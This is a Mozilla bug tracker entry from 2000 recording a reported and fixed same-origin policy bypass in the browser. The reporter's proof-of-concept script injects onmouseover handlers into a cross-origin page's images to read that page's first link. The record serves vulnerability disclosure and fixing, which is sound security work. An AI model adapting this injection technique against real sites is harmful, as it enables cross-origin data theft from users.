Closed Bug 28958 Opened 25 years ago Closed 25 years ago

document.images[] and setAttribute() vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows NT
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: Fix in hand)

Subject: document.images[] and setAttribute() vulnerability Date: Wed, 23 Feb 2000 15:29:36 +0200 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> There is a security vulnerability in document.images[] and setAttribute() method which allows circumventing the Same Origin security policy. The code is: ----------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com","victim"); function f() { for(i=0;i<a.document.images.length;i++) a.document.images[i].setAttribute("onmouseover","alert('The first link is: '+document.links[0].href)"); } setTimeout("f()",5000); </SCRIPT> -----------------------------------------------
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15
Keywords: beta2
Whiteboard: Fix in hand
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.